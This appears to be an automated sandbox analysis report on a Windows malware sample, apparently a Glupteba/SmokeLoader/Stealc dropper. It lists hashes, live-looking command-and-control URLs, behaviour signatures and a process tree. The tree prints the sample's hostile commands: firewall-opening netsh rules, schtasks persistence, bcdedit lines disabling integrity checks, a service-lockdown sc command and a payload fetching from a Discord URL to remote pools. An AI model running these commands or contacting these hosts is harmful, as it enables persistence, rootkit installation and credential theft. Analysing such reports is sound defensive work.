Analysis

  • max time kernel
    294s
  • max time network
    299s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240220-en, locale:en-us, os:windows7-x64, system
  • submitted
    09-05-2024 22:49

General

  • Target

    37a08c70daddf5079288e71df5796d5cd1a2e67fd3b71a4b3492514abca524c4.exe

  • Size

    3.4MB

  • MD5

    886e5d7f4e35c0bb6164dc74bf5e371b

  • SHA1

    009dd91c1ecfa4c39374437f7415871144aaa88b

  • SHA256

    37a08c70daddf5079288e71df5796d5cd1a2e67fd3b71a4b3492514abca524c4

  • SHA512

    b0518c38397749e249e716634541fb9901961ae78734711ef7d7a6446aba4e3d60d073f03532e6aa32f2320a5c30e817647b7aa077b5978b0f0d407375e89994

  • SSDEEP

    49152:eg6HD4YPpoVBQQAbNwmW6Vvfw5ADqfzgF4Cdypovv:0VBFsGvkAF3

Malware Config

Extracted

Family

smokeloader

Version

2022

C2

http://cellc.org/tmp/index.php

http://h-c-v.ru/tmp/index.php

http://icebrasilpr.com/tmp/index.php

http://piratia-life.ru/tmp/index.php

http://piratia.su/tmp/index.php

rc4.i32
rc4.i32

Extracted

Family

stealc

C2

http://185.172.128.150

Attributes
  • url_path

    /c698e1bc8a2f5e6d.php

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Detect ZGRat V1 3 IoCs
  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 14 IoCs
  • Modifies firewall policy service 2 TTPs 1 IoCs
  • PrivateLoader

    PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Stealc

    Stealc is an infostealer written in C++.

  • Windows security bypass 2 TTPs 10 IoCs
  • ZGRat

    ZGRat is a remote access trojan written in C#.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Modifies boot configuration data using bcdedit 14 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Modifies Windows Firewall 2 TTPs 4 IoCs
  • Possible attempt to disable PatchGuard 2 TTPs

    Rootkits can use kernel patching to embed themselves in an operating system.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 8 IoCs
  • Executes dropped EXE 23 IoCs
  • Loads dropped DLL 47 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 4 IoCs

    Detects Themida, an advanced Windows software protection system.

  • UPX packed file 10 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Windows security modification 2 TTPs 10 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Manipulates WinMon driver. 1 IoCs

    Rootkits write to WinMon to hide PIDs from being detected.

  • Manipulates WinMonFS driver. 1 IoCs

    Rootkits write to WinMonFS to hide directories/files from being detected.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 4 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Windows directory 11 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • GoLang User-Agent 3 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 11 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\37a08c70daddf5079288e71df5796d5cd1a2e67fd3b71a4b3492514abca524c4.exe
    "C:\Users\Admin\AppData\Local\Temp\37a08c70daddf5079288e71df5796d5cd1a2e67fd3b71a4b3492514abca524c4.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:840
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
      2⤵
      • Drops startup file
      • Loads dropped DLL
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1996
      • C:\Users\Admin\Pictures\rx8aobajQgPi2jYCndovZLgh.exe
        "C:\Users\Admin\Pictures\rx8aobajQgPi2jYCndovZLgh.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2732
        • C:\Users\Admin\AppData\Local\Temp\u23w.0.exe
          "C:\Users\Admin\AppData\Local\Temp\u23w.0.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          PID:852
        • C:\Users\Admin\AppData\Local\Temp\u23w.1.exe
          "C:\Users\Admin\AppData\Local\Temp\u23w.1.exe"
          4⤵
          • Executes dropped EXE
          • Checks SCSI registry key(s)
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:2680
          • C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
            "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
            5⤵
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:628
      • C:\Users\Admin\Pictures\h0leOmUjjNKQgXZ4Ub4iSUF3.exe
        "C:\Users\Admin\Pictures\h0leOmUjjNKQgXZ4Ub4iSUF3.exe"
        3⤵
        • Modifies firewall policy service
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Checks whether UAC is enabled
        • Drops file in System32 directory
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        PID:2264
      • C:\Users\Admin\Pictures\KPcbTjyc1Nc17ug04VHlsq43.exe
        "C:\Users\Admin\Pictures\KPcbTjyc1Nc17ug04VHlsq43.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2224
        • C:\Users\Admin\Pictures\KPcbTjyc1Nc17ug04VHlsq43.exe
          "C:\Users\Admin\Pictures\KPcbTjyc1Nc17ug04VHlsq43.exe"
          4⤵
          • Windows security bypass
          • Executes dropped EXE
          • Loads dropped DLL
          • Windows security modification
          • Adds Run key to start application
          • Checks for VirtualBox DLLs, possible anti-VM trick
          • Drops file in Windows directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1916
          • C:\Windows\system32\cmd.exe
            C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
            5⤵
              PID:576
              • C:\Windows\system32\netsh.exe
                netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                6⤵
                • Modifies Windows Firewall
                • Modifies data under HKEY_USERS
                PID:2092
            • C:\Windows\rss\csrss.exe
              C:\Windows\rss\csrss.exe
              5⤵
              • Drops file in Drivers directory
              • Executes dropped EXE
              • Loads dropped DLL
              • Adds Run key to start application
              • Manipulates WinMon driver.
              • Manipulates WinMonFS driver.
              • Drops file in Windows directory
              • Modifies system certificate store
              • Suspicious use of AdjustPrivilegeToken
              PID:2176
              • C:\Windows\system32\schtasks.exe
                schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                6⤵
                • Creates scheduled task(s)
                PID:2272
              • C:\Windows\system32\schtasks.exe
                schtasks /delete /tn ScheduledUpdate /f
                6⤵
                  PID:2124
                • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
                  "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Modifies system certificate store
                  PID:2516
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:1676
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:2688
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:2548
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:876
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:884
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:1628
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:2712
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:2452
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:2196
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:1640
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:1688
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\system32\bcdedit.exe -timeout 0
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:1788
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:2888
                • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                  C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                  6⤵
                  • Executes dropped EXE
                  PID:1048
                • C:\Windows\system32\bcdedit.exe
                  C:\Windows\Sysnative\bcdedit.exe /v
                  6⤵
                  • Modifies boot configuration data using bcdedit
                  PID:1756
                • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                  C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                  6⤵
                  • Executes dropped EXE
                  PID:1432
                • C:\Windows\system32\schtasks.exe
                  schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                  6⤵
                  • Creates scheduled task(s)
                  PID:1480
                • C:\Windows\windefender.exe
                  "C:\Windows\windefender.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:2764
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                    7⤵
                      PID:2924
                      • C:\Windows\SysWOW64\sc.exe
                        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                        8⤵
                        • Launches sc.exe
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1832
                  • C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
                    C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
                    6⤵
                    • Executes dropped EXE
                    PID:2084
                  • C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
                    C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
                    6⤵
                    • Executes dropped EXE
                    PID:2852
                  • C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
                    C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
                    6⤵
                    • Executes dropped EXE
                    PID:1600
            • C:\Users\Admin\Pictures\b5tu7XK64n2prVvO6fsfqizw.exe
              "C:\Users\Admin\Pictures\b5tu7XK64n2prVvO6fsfqizw.exe"
              3⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2716
              • C:\Users\Admin\Pictures\b5tu7XK64n2prVvO6fsfqizw.exe
                "C:\Users\Admin\Pictures\b5tu7XK64n2prVvO6fsfqizw.exe"
                4⤵
                • Windows security bypass
                • Executes dropped EXE
                • Windows security modification
                • Adds Run key to start application
                • Checks for VirtualBox DLLs, possible anti-VM trick
                • Drops file in Windows directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:1540
                • C:\Windows\system32\cmd.exe
                  C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                  5⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2740
                  • C:\Windows\system32\netsh.exe
                    netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                    6⤵
                    • Modifies Windows Firewall
                    PID:1668
            • C:\Users\Admin\Pictures\9vHJJFiKQG3A5il8SIXTMMso.exe
              "C:\Users\Admin\Pictures\9vHJJFiKQG3A5il8SIXTMMso.exe"
              3⤵
              • Executes dropped EXE
              • Checks SCSI registry key(s)
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: MapViewOfSection
              PID:1876
            • C:\Users\Admin\Pictures\ZX41IlzcipyL8iUuUd6qulzj.exe
              "C:\Users\Admin\Pictures\ZX41IlzcipyL8iUuUd6qulzj.exe"
              3⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:868
              • C:\Users\Admin\Pictures\ZX41IlzcipyL8iUuUd6qulzj.exe
                "C:\Users\Admin\Pictures\ZX41IlzcipyL8iUuUd6qulzj.exe"
                4⤵
                • Windows security bypass
                • Executes dropped EXE
                • Windows security modification
                • Adds Run key to start application
                • Checks for VirtualBox DLLs, possible anti-VM trick
                • Drops file in Windows directory
                • Modifies data under HKEY_USERS
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:1944
                • C:\Windows\system32\cmd.exe
                  C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                  5⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1032
                  • C:\Windows\system32\netsh.exe
                    netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                    6⤵
                    • Modifies Windows Firewall
                    • Modifies data under HKEY_USERS
                    PID:2364
            • C:\Users\Admin\Pictures\yfDDBThbh41EpImeA79YGTj8.exe
              "C:\Users\Admin\Pictures\yfDDBThbh41EpImeA79YGTj8.exe"
              3⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1584
              • C:\Users\Admin\Pictures\yfDDBThbh41EpImeA79YGTj8.exe
                "C:\Users\Admin\Pictures\yfDDBThbh41EpImeA79YGTj8.exe"
                4⤵
                • Windows security bypass
                • Executes dropped EXE
                • Windows security modification
                • Adds Run key to start application
                • Checks for VirtualBox DLLs, possible anti-VM trick
                • Drops file in Windows directory
                • Suspicious behavior: EnumeratesProcesses
                PID:2944
                • C:\Windows\system32\cmd.exe
                  C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                  5⤵
                    PID:1656
                    • C:\Windows\system32\netsh.exe
                      netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                      6⤵
                      • Modifies Windows Firewall
                      • Modifies data under HKEY_USERS
                      PID:2108
          • C:\Windows\system32\makecab.exe
            "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240509224957.log C:\Windows\Logs\CBS\CbsPersist_20240509224957.cab
            1⤵
            • Drops file in Windows directory
            PID:2456
          • C:\Users\Admin\AppData\Local\Temp\8EA9.exe
            C:\Users\Admin\AppData\Local\Temp\8EA9.exe
            1⤵
            • Executes dropped EXE
            PID:2956
          • C:\Windows\system32\conhost.exe
            \??\C:\Windows\system32\conhost.exe "10871778121052380947-246787217-16831392861181993327-10674469682943562681630954736"
            1⤵
              PID:852
            • C:\Windows\windefender.exe
              C:\Windows\windefender.exe
              1⤵
              • Executes dropped EXE
              • Modifies data under HKEY_USERS
              PID:2312

            Network

            MITRE ATT&CK Enterprise v15

            Downloads

            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

              Filesize

              68KB

              MD5

              29f65ba8e88c063813cc50a4ea544e93

              SHA1

              05a7040d5c127e68c25d81cc51271ffb8bef3568

              SHA256

              1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

              SHA512

              e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

              Filesize

              304B

              MD5

              774063d0a9486f726db3233012e7246f

              SHA1

              8c2f1c9be59fa7839df3a1800b35d1226561bd4b

              SHA256

              2aa6a585fcd0f428b4b7ac8e8eadd4c57a22c6fd1435d35ae4089a277fd39907

              SHA512

              b526126a8462f56d649f5ca71b7b5c8f56aa2dd086579303b000dd149a982ba2a71a44e132af124a13e064a7f28592098cf8b608605b2f4a17ae097327b07951

            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

              Filesize

              304B

              MD5

              12cc34562fab900169e82c66a87332a8

              SHA1

              9c4701c351d38f46300a0be2344b47d31bdd3e1f

              SHA256

              c400a006977026b42cc225a2c6469591a1b6e93f570541ae1393be5a1949df2f

              SHA512

              60c4b0a625f6f39c63753312adf8828943cc4d930dba28e6abed9670d5c4907b84c12fff3730448649e8c56d46537195f30aa3eb2eaf1f5e5102e9cac2763119

            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

              Filesize

              304B

              MD5

              3ff6f2be2f58c4ba253ef2a38892f9d4

              SHA1

              3aae2e87defdb6a55be3bc1c873909031bd1d120

              SHA256

              efef4c7d70445fa64069e46d1deb2e301fbf5c13991fe5538fbbdad97007761e

              SHA512

              099c8c3a194722a4b0fdc657e09c46dea1e3dd073a39756961d2bf95fdc7b54c23fa2fa4b62c8e68b645191b9067322436f9b43e3e538123ed536f3cf5010e94

            • C:\Users\Admin\AppData\Local\Microsoft\ApplicationInsights\bd92d7984d802ff9a1e24336bd1ccb4209c69a1bd116225cd9479ac9d0f516c4\52215b879a954e3eb58a16fa8f586599.tmp

              Filesize

              1KB

              MD5

              356139ec3e026ad80fdc761a00a07a72

              SHA1

              d8b8f218668322983c78ededf0e589267724d569

              SHA256

              1904e6a474d9a93eb417e70c2fa1d8fa0a824edc31ee2f27fc0007c724761328

              SHA512

              c6ef91dbef213c42fa7734cdff91dcd5f0f967fad72bdad3cd134e32baa14e8cf45edfabd7d4edf6e5cc6de0a60ad11dffd5311d9dcbebdaa65ce76a5e1d7f8b

            • C:\Users\Admin\AppData\Local\Temp\8EA9.exe

              Filesize

              331KB

              MD5

              cc193035cd8f2bbd157ff4987775fbce

              SHA1

              62c5c7fb9ea684901b096993ffa94ccd061f7a7b

              SHA256

              95cee0c04c33b542a2d8d1f675b2c6610d91e9a406d744e9fef9197b8be57b6a

              SHA512

              157d687bb89b960b32da06b27edbd85d474531bfe7395bffa30fb207f6fcd1f57ce834f2d87b839d75b5200dafc69b72649c801c0876f4bee2c3e98695fb855c

            • C:\Users\Admin\AppData\Local\Temp\Cab233C.tmp

              Filesize

              65KB

              MD5

              ac05d27423a85adc1622c714f2cb6184

              SHA1

              b0fe2b1abddb97837ea0195be70ab2ff14d43198

              SHA256

              c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

              SHA512

              6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

            • C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

              Filesize

              8.3MB

              MD5

              fd2727132edd0b59fa33733daa11d9ef

              SHA1

              63e36198d90c4c2b9b09dd6786b82aba5f03d29a

              SHA256

              3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e

              SHA512

              3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

            • C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

              Filesize

              492KB

              MD5

              fafbf2197151d5ce947872a4b0bcbe16

              SHA1

              a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020

              SHA256

              feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71

              SHA512

              acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6

            • C:\Users\Admin\AppData\Local\Temp\Tar234E.tmp

              Filesize

              171KB

              MD5

              9c0c641c06238516f27941aa1166d427

              SHA1

              64cd549fb8cf014fcd9312aa7a5b023847b6c977

              SHA256

              4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

              SHA512

              936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

            • C:\Users\Admin\AppData\Local\Temp\Tar240F.tmp

              Filesize

              177KB

              MD5

              435a9ac180383f9fa094131b173a2f7b

              SHA1

              76944ea657a9db94f9a4bef38f88c46ed4166983

              SHA256

              67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

              SHA512

              1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

            • C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe

              Filesize

              2.0MB

              MD5

              1bf850b4d9587c1017a75a47680584c4

              SHA1

              75cd4738ffc07f203c3f3356bc946fdd0bcdbe19

              SHA256

              ac470c2fa05a67dd03cdc427e9957e661cd0ec7aecd9682ddb0b32c5cfc18955

              SHA512

              ed57be8c5a982bcbf901c2b035eb010e353508e7c7df338adc6e5c307e94427645e5f5ec28667fd861420b9411b4ade96ea6987519ed65e6c1d905b6eadfce08

            • C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe

              Filesize

              2.8MB

              MD5

              713674d5e968cbe2102394be0b2bae6f

              SHA1

              90ac9bd8e61b2815feb3599494883526665cb81e

              SHA256

              f724b2849e7dc38bf62114c11092020073bea509e2bc57dea7a94a2fc9c23057

              SHA512

              e9fba80067ac39d5907560abd044bb97dfcf078db2b6696ff4ca5990d9803a0c24b39d04e05682ac3dac8bc472e2ee0c573a46514e907f4d9673d4e7a76caafb

            • C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe

              Filesize

              2.0MB

              MD5

              dcb505dc2b9d8aac05f4ca0727f5eadb

              SHA1

              4f633edb62de05f3d7c241c8bc19c1e0be7ced75

              SHA256

              61f9194b9f33611ec902f02755cf2e86f0bbc84c2102c6e5d1874f9bae78e551

              SHA512

              31e1fce9aca3b5d9afc85640af04b4542b9897f7d60b699e3153516137d9358d3c101cacc04e9e594e36b8622e9489cecf0dda210662563565d80fb9a33549b3

            • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

              Filesize

              281KB

              MD5

              d98e33b66343e7c96158444127a117f6

              SHA1

              bb716c5509a2bf345c6c1152f6e3e1452d39d50d

              SHA256

              5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

              SHA512

              705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

            • C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

              Filesize

              2KB

            • C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

              Filesize

              3KB

            • C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

              Filesize

              5.3MB

            • C:\Users\Admin\AppData\Local\Temp\osloader.exe

              Filesize

              591KB

            • C:\Users\Admin\AppData\Local\Temp\u23w.0.exe

              Filesize

              206KB

            • C:\Users\Admin\Pictures\9vHJJFiKQG3A5il8SIXTMMso.exe

              Filesize

              213KB

            • C:\Users\Admin\Pictures\b5tu7XK64n2prVvO6fsfqizw.exe

              Filesize

              4.1MB

            • C:\Users\Admin\Pictures\rx8aobajQgPi2jYCndovZLgh.exe

              Filesize

              384KB

            • \ProgramData\mozglue.dll

              Filesize

              593KB

            • \ProgramData\nss3.dll

              Filesize

              2.0MB

            • \Users\Admin\AppData\Local\Temp\csrss\patch.exe

              Filesize

              1.7MB

            • \Users\Admin\AppData\Local\Temp\dbghelp.dll

              Filesize

              1.5MB

            • \Users\Admin\AppData\Local\Temp\symsrv.dll

              Filesize

              163KB

            • \Users\Admin\AppData\Local\Temp\u23w.1.exe

              Filesize

              4.6MB

            • \Users\Admin\Pictures\KPcbTjyc1Nc17ug04VHlsq43.exe

              Filesize

              4.1MB

